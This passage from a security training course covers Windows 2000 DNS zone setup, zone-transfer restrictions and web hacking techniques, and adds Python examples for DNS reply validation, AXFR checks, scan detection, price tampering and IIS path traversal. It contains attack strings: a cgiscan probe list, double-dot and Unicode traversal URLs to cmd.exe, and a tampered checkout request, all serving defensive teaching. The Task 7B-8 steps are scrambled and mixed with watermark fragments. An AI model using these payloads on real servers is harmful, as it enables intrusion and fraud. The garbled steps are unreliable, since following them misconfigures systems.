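        if rtype == TYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        records.append((name, rtype, rdata))
    return {"id": tx_id, "flags": flags, "questions": questions, "records": records}


def validate_reply(sent_query, reply, server_ip, reply_src, zone):
    """Return (accepted_records, reason). The source check alone is weak, since an
    on-path attacker can forge it; the transaction ID and question checks must hold
    too, and the bailiwick rule drops records the queried server may not speak for."""
    if reply_src != server_ip:
        return [], "reply from %s, but the query went to %s" % (reply_src, server_ip)
    q, r = parse_message(sent_query), parse_message(reply)
    if r["id"] != q["id"]:
        return [], "transaction ID mismatch"
    if not r["flags"] & FLAG_QR:
        return [], "not a response"
    if r["questions"] != q["questions"]:
        return [], "question section does not match the query"
    zone = zone.rstrip(".").lower()
    accepted = [rec for rec in r["records"] if rec[0] == zone or rec[0].endswith("." + zone)]
    dropped = len(r["records"]) - len(accepted)
    return accepted, ("dropped %d out-of-bailiwick record(s)" % dropped) if dropped else "ok"


# Constructed classroom traffic: a student asks the instructor's server (172.17.10.1)
# for STU-W2K-L01 in scnpdns.edu; the poisoned reply smuggles in an unrelated name.
QNAME = "stu-w2k-l01.scnpdns.edu"
QUERY = build_query(0x1234, QNAME)
GOOD_REPLY = build_reply(0x1234, QNAME, [(QNAME, "172.16.10.1")])
POISON_REPLY = build_reply(0x1234, QNAME, [(QNAME, "172.16.10.1"), ("www.example.com", "10.9.9.9")])

if __name__ == "__main__":
    print(validate_reply(QUERY, GOOD_REPLY, "172.17.10.1", "172.17.10.1", "scnpdns.edu"))
    print(validate_reply(QUERY, GOOD_REPLY, "172.17.10.1", "172.16.10.105", "scnpdns.edu"))
    print(validate_reply(QUERY, POISON_REPLY, "172.17.10.1", "172.17.10.1", "scnpdns.edu"))
```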

INSTRUCTOR TASK 7B-2

Installing a Standard Primary DNS Server on a Windows 2000 Server

Setup: Your instructor will perform this task on the instructor machine.

1. If necessary, log on to Windows 2000 Server as Administrator.
2. Configure the nameserver lookup for the network interface 172.17.10.1 to be 172.17.10.1. To do this, right-click My Network Places, and choose Properties. Right-click the Ethernet interface for 172.17.10.1, and choose Properties. Double-click Internet Protocol (TCP/IP). Select Use The Following DNS Server Addresses, and enter 172.17.10.1. Then click OK twice.
3. From the Network And Dial-up Connections Control Panel menu, choose Advanced→Optional Networking Components.
4. In the Components window, highlight, but do not check, Networking Services and click the Details button.
5. Check DNS and click OK.
6. Click Next, point to the location of your Windows 2000 Server's i386 installation files, click Open, and click OK. You now have the DNS server installed on your machine.

Reverse Lookup Zones

Now your instructor will create Reverse Lookup Zones for the Left, Center, and Right to match the subnets, just the way your class is laid out. Your instructor will also configure Zone Transfer properties for selective transfers. There is no particular reason for creating Reverse Lookup Zone(s) first and then the Forward Lookup Zone(s). It's just that, by creating a Reverse Lookup Zone first, you are indicating an awareness of the various subnets that make up your network. This will lead to a more streamlined approach if you create host records via dynamic DNS (DDNS); their associated reverse lookup records will be automatically created and placed in their appropriate zones. Even when you are manually creating host records, if you check the option to simultaneously create a reverse lookup record, the reverse lookup record will automatically be placed in the appropriate zone.


INSTRUCTOR TASK 7B-3

Creating Reverse Lookup Zones

Setup: Your instructor will perform this task on the instructor machine.

1. From the Start menu, choose Programs→Administrative Tools→DNS.
2. Expand INS-W2K-C01, select and right-click Reverse Lookup Zones, and choose New Zone.
3. Click Next, verify that Standard Primary is selected, and click Next.
4. For Network ID, enter 172.16.10.
5. Click Next twice, then click Finish.
6. Create Reverse Lookup Zones for the 172.17.10 and 172.18.10 zones. Use the steps above as a guide.
7. Expand the Reverse Lookup Zones folder.
8. Select and right-click the Reverse Lookup Zone 172.16.10.x Subnet, and choose Properties.
9. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and add the IP addresses for all student machines that are on the 172.16.10.x subnet. Click OK.
10. Select and right-click the Reverse Lookup Zone 172.17.10.x Subnet, and choose Properties.
11. Select the Zone Transfers tab, uncheck Allow Zone Transfers. Click OK.
12. Select and right-click the Reverse Lookup Zone 172.18.10.x, and choose Properties.
13. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and add the IP addresses for all student machines that are on the 172.18.10.x subnet.
14. Click OK.

Forward Lookup Zones

Now, your instructor will create a Forward Lookup Zone for the whole class. Your instructor will also configure Zone Transfer properties for selected transfers.


INSTRUCTOR TASK 7B-4

Creating a Forward Lookup Zone

Setup: Your instructor will perform this task on the instructor machine.

1. Select and right-click Forward Lookup Zones, and choose New Zone.
2. Click Next, verify that Standard Primary is selected, and click Next.
3. For Zone Name, enter scnpdns.edu.
4. Click Next twice, and then click Finish.
5. Expand Forward Lookup Zones, then select and right-click scnpdns.edu, and choose Properties.
6. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and enter the IP addresses for all student machines that are on the 172.16.10.x and 172.18.10.x subnets.
7. Click OK.
8. If necessary, select the Zone you just created.
9. Right-click anywhere in the right pane, and choose New Host.
10. For the Host Name, enter STU-W2K-L01.
11. Enter the IP address for the host name, such as 172.16.10.1, and create the associated PTR record.
12. Click Add Host, click OK, then click Done.
13. Create a host record for every student machine in the classroom. Use the steps above as a guide.
14. Right-click each of the three Reverse Lookup Zones, and choose Refresh.
15. Right-click each of the three Reverse Lookup Zones, and choose Update Server Data File.
16. Right-click the Forward Lookup Zone scnpdns.edu, and choose Refresh.
17. Right-click the Forward Lookup Zone scnpdns.edu, and choose Update Server Data File.

Installing DNS

Now that a Standard Primary Server has been set up, you and the other students will install a DNS server on each of your machines. These are the servers that will later be configured as Standard Secondary Servers.


TASK 7B-5

Installing DNS Servers

Setup: Perform this task on all student machines.

1.  If necessary, log on to Windows 2000 Server as the renamed Administrator account.
2.  Open a command prompt and enter the ipconfig /all command.
3.  Verify that you do not have a configuration for DNS server lookup.
4.  Keep the command prompt open.
5.  From your desktop, right-click My Network Places, and choose Properties.
6.  Double-click the Classroom Hub interface.
7.  Click Properties, double-click TCP/IP, specify your IP address in the field for Use The Following DNS Server Addresses, and click OK twice.
8.  Switch back to the command prompt and reenter the ipconfig /all command.
9.  Verify that you now have a configuration for DNS server lookup.
10. From the Network And Dial-up Connections Control Panel menu, choose Advanced→Optional Networking Components.
11. In the Components window, highlight, but do not check, Networking Services, and click the Details button.
12. Check DNS, and click OK.
13. Click Next, point to the location of your Windows i386 installation files, click Open, and click OK. You now have a DNS server installed on your machine.

Zone Configuration

Now that your DNS server has been set up, you will practice installing a Standard Primary Server of your own. You will verify the configuration files associated with your DNS server. You will then remove this zone from your DNS server.


TASK 7B-6

Creating, Viewing, and Deleting Forward and Reverse Lookup Zones

1.  From the Start menu, choose Programs→Administrative Tools→DNS.
2.  Click the + sign next to your computer name to expand it. You should see two folders, one called Forward Lookup Zones and the other Reverse Lookup Zones. You can right-click either of these to add zones. First, we will add a Forward Lookup Zone.
3.  Select and right-click Forward Lookup Zones, and choose New Zone.
4.  Click Next, verify that Standard Primary is selected, and click Next.
5.  For Domain Name, enter studentxxx.edu, where xxx are the last three characters of your computer name. If your computer name is stu-w2k-r03, then you should create the Forward Lookup Zone studentr03.edu.
6.  Click Next twice, and then click Finish.
7.  Expand Forward Lookup Zones, and click the zone that you just created.
8.  Observe the SOA (Start of Authority) and NS (nameserver) records with your server's IP address.
9.  Right-click anywhere in the right pane, and choose New Host.
10. In the New Host dialog box, enter testhost for the hostname.
11. Enter an IP address, such as 192.168.10.101.
12. Click Add Host, click OK, and then click Done.
13. Right-click anywhere in the right pane, and choose Update Server Data File.
14. Open Explorer, and navigate to your \WINNT\System32\dns folder.
15. Right-click studentxxx.edu.dns, and choose Open With.
16. Select Notepad, uncheck Always Use This Program To Open These Files, and click OK.
17. Observe that an A record for testhost has been created. You can also see the text format of the SOA and NS records.
18. Switch back to the DNS console.
19. Right-click the zone you just created, and choose Delete. Click OK to confirm the deletion of the zone.


Standard Secondary DNS Servers

You will now configure your server to be a Standard Secondary Server. You will also verify that your Secondary Server will be able to receive the zone database information that it is entitled to.

TASK 7B-7

Creating Secondary Zones

Setup: To create a secondary zone, you first need a primary zone to be up and running. Your instructor's machine is configured with the primary zone scnpdns.edu, so we can proceed.

1.  Select and right-click Forward Lookup Zones, and choose New Zone.
2.  Click Next, select Standard Secondary, and click Next.
3.  For Zone Name, type scnpdns.edu. In an AD environment, you can browse for zones.
4.  Click Next.
5.  For the IP address of the instructor machine running the DNS server, enter 172.17.10.1.
6.  Click Add, click Next, and then click Finish.
7.  Click the zone that you just created.
8.  If you see a red X and a message that states Zone Not Loaded By DNS Server, right-click the zone, and choose Transfer From Master. Then, refresh the DNS console until the zone information is displayed. The zone database should transfer to your DNS server from the instructor's machine.
9.  Right-click in the right pane.
10. Observe that, because this zone is a secondary zone, no records can be added or modified. You can only do two things: refresh the list or transfer the list from the primary server.
11. Select and right-click Reverse Lookup Zones, and choose New Zone.
12. Click Next, select Standard Secondary, and click Next.
13. If your IP address is 172.16.10.x, enter 172.16.10 for the Network ID. If your IP address is 172.18.10.x, enter 172.18.10 for the Network ID.
14. Click Next.
15. For the IP address of the instructor machine, enter 172.17.10.1.
16. Click Add, click Next, and click Finish.
17. Expand Reverse Lookup Zones, and click the zone that you just created.
18. If the zone was not loaded by the DNS server, right-click the zone, and choose Transfer From Master. The zone database should transfer to your DNS server from the instructor's machine.
20. Observe that, again, because this zone is a secondary zone, no records can be added or modified. You can only do two things: refresh the list or transfer the list from the primary server.

Zone Transfers

You will now verify that your Secondary Server will not be able to receive zone database information that it is not entitled to.

TASK 7B-8
1. 2. 3.

Attempting Blocked Zone Transfers


Click Next, select Standard Secondary, and click Next. If your IP address is 172.16.10.x, enter 172.18.10 for the Network ID. If your IP address is 172.18.10.x, enter 172.16.10 for the Network ID.

or
DO NO

ru ct
5. 6. 7. 8.

4.

Click Next.

Click Add, click Next, and click Finish.

In

440

Hardening The Infrastructure (SCP)

st

Verify that you see a red X and the message Zone Not Loaded by DNS Server. Right-click the zone, and choose Transfer From Master. This time, the zone database should not transfer to your DNS server from the instructors machine. This is because the Primary Server has congured that only certain secondary servers will be allowed to transfer zone database information, and your server is not on that list. Right-click Reverse Lookup Zone, and choose New Zone.

9.

10. Click Next, select Standard Secondary, and click Next. 11. For the Network ID, enter 172.17.10. 12. Click Next.

In the left pane, click the zone that you just created.

DU

For the IP address of the instructor machine, enter 172.17.10.1.

PL

IC

AT

Select and right-click Reverse Lookup Zones, and choose New Zone.

Ed

iti

on

19. Right-click in the right pane.

13. For the IP address of the instructor machine, enter 172.17.10.1. 14. Click Add, click Next, and click Finish. 15. In the left pane, click the zone that you just created.

This is because the Primary Server has congured that no servers will be allowed to transfer zone database information. 17. Close all open windows.
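A practical check for the two tasks above, added here as an example (it is not part of the course material and not a Microsoft tool): the script builds a raw DNS AXFR request, sends it over TCP, and classifies the server's first reply so you can confirm from any host whether your primary will hand out a zone. The server address and zone name are the ones used in the lab (172.17.10.1, scnpdns.edu); the two sample replies at the end are constructed, not captured, so the verdict logic can be exercised without a network.

```python
"""Check whether a DNS server will hand a zone to this host via AXFR."""
import socket
import struct

RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
          4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}
QTYPE_AXFR = 252
QCLASS_IN = 1
TXID = 0x1234


def encode_name(name):
    """'scnpdns.edu' -> b'\\x07scnpdns\\x03edu\\x00' (DNS label format)."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label: %r" % label)
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def build_axfr_query(zone, txid=TXID):
    """12-byte header (QR=0, RD=0, one question) + an AXFR question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, QCLASS_IN)
    return header + question


def parse_header(msg):
    """Return (txid, rcode, ancount) from a DNS response message."""
    if len(msg) < 12:
        raise ValueError("truncated DNS header")
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:          # QR bit must be set on a response
        raise ValueError("not a response")
    return txid, flags & 0x000F, an


def classify_axfr(msg, txid=TXID):
    """Verdict for the first message of an AXFR reply.

    A transfer is ALLOWED only on RCODE 0 with at least one answer record
    (a transfer opens with the zone's SOA). Anything else is a denial;
    REFUSED (RCODE 5) is the usual form, which is what TASK 7B-8 expects
    from a primary whose transfer list does not include you.
    """
    rid, rcode, ancount = parse_header(msg)
    if rid != txid:
        return "MISMATCHED-ID"
    if rcode == 0 and ancount > 0:
        return "ALLOWED"
    return "DENIED (%s)" % RCODES.get(rcode, "RCODE%d" % rcode)


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def try_axfr(server, zone, port=53, timeout=5.0):
    """Live check: AXFR is TCP-only, each message carries a 2-byte length prefix."""
    query = build_axfr_query(zone)
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)
        length, = struct.unpack("!H", recv_exact(s, 2))
        first = recv_exact(s, length)
    return classify_axfr(first)


# Constructed sample replies (not captured from a real server).
QUESTION = encode_name("scnpdns.edu") + struct.pack("!HH", QTYPE_AXFR, QCLASS_IN)
# QR=1, RCODE=5: flags 0x8005, no answer records.
REFUSED_REPLY = struct.pack("!HHHHHH", TXID, 0x8005, 1, 0, 0, 0) + QUESTION
# QR=1, AA=1: flags 0x8400, one SOA answer opening the transfer.
SOA_RDATA = (encode_name("ns.scnpdns.edu") + encode_name("admin.scnpdns.edu")
             + struct.pack("!IIIII", 1, 3600, 600, 86400, 3600))
ALLOWED_REPLY = (struct.pack("!HHHHHH", TXID, 0x8400, 1, 1, 0, 0) + QUESTION
                 + encode_name("scnpdns.edu")
                 + struct.pack("!HHIH", 6, QCLASS_IN, 3600, len(SOA_RDATA))
                 + SOA_RDATA)

if __name__ == "__main__":
    print("constructed refusal:", classify_axfr(REFUSED_REPLY))
    print("constructed transfer:", classify_axfr(ALLOWED_REPLY))
    # In the lab: print(try_axfr("172.17.10.1", "scnpdns.edu"))
```

Run it from a machine that is not on the primary's transfer list as well as from one that is; only the listed secondary should see ALLOWED. Only the first message is inspected because a denial is always a single message, while a successful transfer may continue across several.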

Topic 7C
Describing Web Hacking Techniques

Common Web Hacking Techniques

Vulnerability Scanning

Although it may not be the most glamorous of techniques, searching for existing vulnerabilities is a simple way to recognize holes that will not take much effort to capitalize on. Even after Web holes and well-known vulnerabilities have been exposed for years, many Web administrators do not patch or fix them.

Instead of taking the time to manually look for holes, hackers will use tools designed to search for specific exploit opportunities. These tools will scan a site, looking for the exact type of vulnerability that the hacker seeks.

One of the most popular of these is simply cgiscan.c. This program connects to a Web server (UNIX or NT) and scans to see if the given CGI vulnerabilities are present. If they are, the hacker is notified of the condition and can then proceed to exploit the hole.

CGI (Common Gateway Interface): CGI is the method that Web servers use to allow interaction between servers and clients.

The following is an excerpt from the code of cgiscan.c to show several of the vulnerabilities this scan searches for:

    temp[1] = "GET /cgi-bin/phf HTTP/1.0\n\n";
    temp[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
    temp[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
    temp[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
    temp[5] = "GET /cgi-bin/handler HTTP/1.0\n\n";
    temp[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
    temp[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";

Hackers can use this simple and efficient scanner to test sites very quickly. This effective program is one way hackers can identify holes in the security of potential targets. Each request is a fixed, well-known path, which is also what makes such a scan easy to recognize in a Web server's access log.
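On the defending side, the same probe list can be turned into detection. The following is an added example (not part of the course and not code from cgiscan.c) that reads Web server access logs in Apache common log format and flags any source that requests several of the cgiscan paths within a short window. The log lines are constructed for the demonstration, and the threshold and window are tuning assumptions.

```python
"""Spot a cgiscan-style sweep in Web server access logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The paths requested by cgiscan.c, from the excerpt above.
CGISCAN_PROBES = {
    "/cgi-bin/phf", "/cgi-bin/Count.cgi", "/cgi-bin/test-cgi",
    "/cgi-bin/php.cgi", "/cgi-bin/handler", "/cgi-bin/webgais",
    "/cgi-bin/websendmail",
}

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """(ip, timestamp, path-without-query, status) or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, path, int(m.group("status"))


def find_cgi_scans(lines, min_probes=3, window=timedelta(minutes=5)):
    """{ip: sorted distinct probe paths} for every source that requested at
    least `min_probes` different cgiscan paths inside one `window`.

    Distinct paths are what separate a scan from noise: one /cgi-bin/phf hit
    may be a stale link, but phf + test-cgi + handler from one address within
    minutes is a sweep. The status code is deliberately ignored; the scanner
    is hunting for 200s, the defender is looking for the sweep itself.
    The threshold and window are tuning assumptions, not values from the text.
    """
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, _status = parsed
        if path in CGISCAN_PROBES:
            hits[ip].append((ts, path))

    scanners = {}
    for ip, events in hits.items():
        events.sort()
        for i, (start, _first) in enumerate(events):
            seen = {p for t, p in events[i:] if t - start <= window}
            if len(seen) >= min_probes:
                scanners[ip] = sorted(seen)
                break
    return scanners


# Constructed sample log: 10.10.10.9 sweeps four probes in seconds, 10.10.10.7
# touches three probes spread over ninety minutes, 10.10.10.5 is ordinary traffic.
SAMPLE_LOG = """\
10.10.10.5 - - [12/Mar/2003:10:00:01 -0500] "GET /index.html HTTP/1.0" 200 1043
10.10.10.9 - - [12/Mar/2003:10:00:02 -0500] "GET /cgi-bin/phf HTTP/1.0" 404 210
10.10.10.9 - - [12/Mar/2003:10:00:02 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 210
10.10.10.9 - - [12/Mar/2003:10:00:03 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 200 512
10.10.10.9 - - [12/Mar/2003:10:00:03 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 210
10.10.10.5 - - [12/Mar/2003:10:02:30 -0500] "GET /cgi-bin/phf?Qalias=x HTTP/1.0" 404 210
10.10.10.7 - - [12/Mar/2003:09:00:00 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 210
10.10.10.7 - - [12/Mar/2003:09:30:00 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 210
10.10.10.7 - - [12/Mar/2003:10:30:00 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 210
""".splitlines()

if __name__ == "__main__":
    for ip, probes in find_cgi_scans(SAMPLE_LOG).items():
        print("%s: %d distinct cgiscan probes: %s" % (ip, len(probes), ", ".join(probes)))
```

Feed it a real access log one line at a time; widen the window if you want to catch slow scans like the 10.10.10.7 pattern, at the cost of more false positives.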

Incorrect Web Design

Common mistakes that Web designers make are to include extra information or to include what are known as hidden tags. These tags define values for a Web page that are not visible through the normal Web browser. Only when the source of a Web page is viewed can these tags be revealed. This extra information could be phone numbers, addresses, site designer logos, even the directory structure of the hard drive where the site resides. Hackers will simply connect normally to a Web site and view the source code of the various pages, searching for keywords and clues to further assist in attacking the site or network. This process can become tedious, however. If there is a site with hundreds of pages, searching their source code, page by page, can take days. Teleport Pro is a tool that assists in this procedure. With options such as the ability to download an entire Web site to a local hard drive for further examination, Teleport Pro has great features. Teleport Pro can also mirror entire Web sites, including their directory structures. See Figure 7-8 for an example of what Teleport Pro can do.

Figure 7-8: An example of the options available with Teleport Pro.

Although not as common as in previous years, mainly due to better programming, there are sites and pages where hidden tags in the actual Web pages define the prices of items entered into open text boxes. If this is found to be true, the hacker can simply modify the code to represent a value of, say, $5.95 instead of $59.95. During the checkout process on that site, the hacker simply proceeds as any other user, only with a significant discount on goods purchased! The fix belongs on the server: a price carried in a hidden field is client-supplied input, so the server must look the price up from its own catalog and never trust the value that arrives with the form.

Figure 7-9: An example of hidden tags in the source code of a Web page. Notice the price tags visible to be edited.
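The following is an added example (not part of the course) showing both halves of the problem described above: the "view source" step that harvests hidden fields from a page, and the checkout handler written the vulnerable way beside the corrected one. The form, catalog, and tampered request are constructed for the demonstration, and the function names are assumptions rather than any real site's API.

```python
"""Hidden price fields: what 'view source' reveals and how the server must handle it."""
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed checkout form of the kind Figure 7-9 shows: the unit price
# travels in a hidden field, so it reaches the server as client-controlled input.
ORDER_FORM = """
<form action="/checkout" method="post">
  <input type="hidden" name="item" value="SKU-1001">
  <input type="hidden" name="price" value="59.95">
  Quantity: <input type="text" name="qty" value="1">
  <input type="submit" value="Buy">
</form>
"""


class HiddenFieldFinder(HTMLParser):
    """Collects every hidden <input>: the attacker's 'view source' step."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden[a.get("name")] = a.get("value")


def find_hidden_fields(html):
    finder = HiddenFieldFinder()
    finder.feed(html)
    return finder.hidden


# Server side. Prices are integer cents; CATALOG is the only price source the
# hardened handler trusts.
CATALOG = {"SKU-1001": 5995}


def total_vulnerable(post_body):
    """Trusts the submitted price: the flaw the text describes."""
    f = parse_qs(post_body)
    unit_cents = int(round(float(f["price"][0]) * 100))
    return unit_cents * int(f["qty"][0])


def total_hardened(post_body):
    """Ignores any client-supplied price; looks the price up by item id and
    validates the one field the client legitimately controls."""
    f = parse_qs(post_body)
    item = f.get("item", [""])[0]
    if item not in CATALOG:
        raise ValueError("unknown item")
    try:
        qty = int(f.get("qty", ["0"])[0])
    except ValueError:
        raise ValueError("quantity is not a number")
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return CATALOG[item] * qty


# The attacker saves the page, edits 59.95 to 5.95, and submits the form.
TAMPERED_POST = "item=SKU-1001&price=5.95&qty=1"

if __name__ == "__main__":
    print("hidden fields seen in source:", find_hidden_fields(ORDER_FORM))
    print("vulnerable total (cents):", total_vulnerable(TAMPERED_POST))
    print("hardened total (cents):  ", total_hardened(TAMPERED_POST))
```

The hardened handler does not even read the price field; the only thing the client is allowed to choose is which catalog item and how many, and both are checked.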

Buffer Overflows

Buffer overflows are a staple of hacking techniques that are not lost on Web hacking. Buffer overflows are very effective, and there are two outstanding papers on the subject: How to Write Buffer Overflows, by Mudge (1995), and Smashing the Stack for Fun and Profit, by Aleph One (1996). These two papers outline the methods and techniques for creating buffer overflows.

buffer overflow: This happens when more data is put into a buffer or holding area than the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a back door leading to system access.

The concept of a buffer overflow is to exploit a program that does not check the size of input being stored in a buffer (memory space). By writing input data that is beyond the normal bounds of the program, an attacker can make modifications to program data stored in an adjacent memory space.

Attackers will target programs that have been written in C, as native C programming does not include a bounds-checking feature. (Bounds checking verifies that input is limited to the size of the buffer that will hold it, rather than left open-ended.) Two examples of C functions without such checking are gets and strcpy. The attack generally has the goal of running an unauthorized process as root. If the attack executes properly, the attacker will have a root shell at his or her disposal. This is why buffer overflows can be so dangerous: an attacker issues a buffer overflow remotely and ends up with a root shell on a local machine. Although it may seem that buffer overflows are the key to taking down systems, and you may be wondering why every system on the Internet is not already compromised, the answer is that the actual writing of buffer overflows is not the easiest of processes to accomplish.

Hacking Via a Buffer Overflow

In order for an attacker to start from scratch and attempt a buffer overflow of a target system, the following steps would have to be completed:
1. Locate the potential target on the Internet. (Not difficult.)
2. Identify the running operating system. (Not difficult.)
3. Identify the running services and programs on the target system. (Starting to get more difficult, since open ports do not indicate all running services and programs.)
4. Reverse-engineer the services and programs on the target, looking for the potential buffer overflow holes. (This is where the level of difficulty jumps much higher.)
5. Write the attack code to fall in the correct buffer space on the target. (Still remaining quite difficult.)
6. Inject attack code on the target system. (Variable difficulty, depending on open ports, services, and programs running.)
7. Have the code execute and access the root shell. (Not difficult, assuming that the exploit is written properly.)

Keeping this in mind, the process of buffer overflows may not seem so overpowering as it did a few minutes ago. However, before the assumption is made that buffer overflows are not a problem, you must realize that making a buffer overflow from scratch is not required. When buffer overflows are discovered, exploits are written, perhaps by only one person, that become available on the Internet. This makes buffer overflows as dangerous as ever, and arguably even more so: hackers can now use buffer-overflow attacks with no concept of how they work or what their functions are. The danger is definitely real.

TASK 7C-1
Identifying Web Hacking Techniques

1. Discuss, with at least one other student, the principles of the DDoS, buffer overflows, Web design flaws, and vulnerability scanning.
2. Define potential countermoves that could be used against these techniques. Be prepared to discuss your findings with the rest of the class.
Responses will vary.

Web Server Security

Securing a Web server is perhaps the most nerve-racking position that security professionals can find themselves in. With changes happening daily, if not hourly, these security professionals may find themselves overwhelmed by the amount of information they must constantly absorb.

IIS Security

When Microsoft released Windows 2000, it came packaged with powerful Web server software in the form of Internet Information Server (IIS) 5.0. This software allows anyone to quickly and easily set up myriad services, including Web services. Although the number of sites hosted by IIS grows consistently, it is still far behind in terms of Web hosting on the Internet.

One of the reasons that IIS is not the leading Web-hosting platform is that there have been many serious security issues with hosting a Web site on IIS. Over the years, IIS has been found to have many vulnerabilities; often, these vulnerabilities fall under the category of buffer overflows. One of the methods that attackers use to gain access to a Web site is often called the double-dot vulnerability. This is an attack that is designed to input a character stream that will allow the attacker to gain access to directories outside of the Web data.

A common attack that tries to use this vulnerability would look like this: http://10.10.10.1/scripts/../../winnt/system32/cmd.exe. This type of attack, which may be successful on older, unpatched Web servers, will not work on a Microsoft IIS 5.0 Web server. The reason it will not work is that built into the IIS software is a security-checking feature that looks for the /../ pattern. If this pattern is seen, the server will not grant the request, and the attack fails.

There is, however, a variation of this attack that the security-checking feature of IIS will not catch. This is the Unicode vulnerability. This attack looks like this: http://10.10.10.1/scripts/..%c0%af../winnt/system32/cmd.exe. Although it looks similar to the previous attack, this one would be successful on a default IIS 5.0 server, because the IIS security check runs before the Unicode characters are decoded: %c0%af is an overlong UTF-8 encoding of the slash character, so the raw request contains no /../ for the check to match, yet after decoding it is exactly the double-dot path the check was meant to stop. Once successful, this attack will provide the attacker a command prompt for the server on the remote client. The general lesson is that input must be decoded and canonicalized before any security check is applied to it, never after.

Another attack that IIS 5.0 servers are vulnerable to is the attack via the Internet Printing Protocol (IPP). IPP provides users the ability to print documents across the Internet, submitted via a Web browser. Internet Printing is on by default in all IIS 5.0 installations, and all unpatched systems are vulnerable to this exploit.

The specific vulnerability is a buffer overflow in msw3prt.dll. In order for an attacker to take advantage of this, he or she would submit a string of approximately 420 characters that will, in turn, cause the overflow. The result of the overflow in this case can be a remote command prompt. For further reading on this vulnerability, please visit the eEye Web site at www.eeye.com, and look under the Advisories link.

Securing IIS 5.0

To secure a machine running IIS 5.0, it is suggested that you follow these recommendations:
1. Apply the hisecweb.inf high security template. (Templates were covered earlier in the course.)
2. Monitor security updates from Microsoft, using the Microsoft Hotfix utility. Have this tool configured to retrieve updates every day.
3. Follow the steps of the Microsoft Secure Internet Information Services 5.0 Checklist from TechNet.
4. Harden the IIS machine according to the Microsoft TechNet article From Blueprint to Fortress: A Guide to Securing IIS 5.0.
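The ordering bug behind the Unicode vulnerability is easy to reproduce in a few lines. The following is an added example (not IIS code and not from the course): two request-path checkers, one that pattern-matches the raw path before decoding, as IIS 5.0 did, and one that decodes and canonicalizes first. The lenient UTF-8 decoder deliberately accepts overlong two-byte sequences such as C0 AF, because that is the server behaviour the attack relied on; a strict decoder would reject them. The Web-root layout and the request paths are constructed for the demonstration.

```python
"""Decode-then-check versus check-then-decode for request paths."""
import posixpath
import string

# Simplified layout: the /scripts virtual directory is taken to sit directly
# under the Web root (constructed for the demo; real IIS maps it elsewhere).
WEB_ROOT = "/c/inetpub"


def percent_decode(path):
    """'%xx' escapes -> raw bytes. Kept as bytes so that %c0%af stays C0 AF."""
    out = bytearray()
    i = 0
    while i < len(path):
        hexpair = path[i + 1:i + 3]
        if path[i] == "%" and len(hexpair) == 2 and all(h in string.hexdigits for h in hexpair):
            out.append(int(hexpair, 16))
            i += 3
        else:
            out += path[i].encode("utf-8")
            i += 1
    return bytes(out)


def lenient_utf8(data):
    """Decode UTF-8 the way the vulnerable server did: a two-byte sequence is
    accepted even when it is overlong, so C0 AF becomes '/'. A strict decoder
    rejects C0/C1 lead bytes outright. Longer sequences are not needed here
    and are mapped to U+FFFD."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def check_then_decode(request_path):
    """The flawed order from IIS 5.0: pattern-match the raw request, then decode.
    Returns 'BLOCKED' or the file system path the request would reach."""
    if "/../" in request_path or request_path.startswith("../"):
        return "BLOCKED"
    decoded = lenient_utf8(percent_decode(request_path)).replace("\\", "/")
    return posixpath.normpath(WEB_ROOT + "/" + decoded.lstrip("/"))


def decode_then_check(request_path):
    """The correct order: decode and canonicalize first (including %5c, the
    backslash IIS also treats as a separator), then require that the resolved
    path still lies under the Web root."""
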